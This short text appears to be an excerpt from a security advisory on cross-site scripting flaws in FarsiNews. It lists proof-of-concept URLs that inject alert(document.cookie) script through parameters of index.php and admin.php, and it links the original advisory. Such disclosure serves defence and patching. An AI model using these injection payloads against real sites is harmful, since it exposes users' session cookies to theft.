XSS attack: http://[target]/[farsinews_path ]/index.php?month=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--&year=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- http://[target]/[farsinews_path]/admin.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C !-- Original Advisory http://www.aria-security.net/advisory/farsinews/farsinews0420062.txt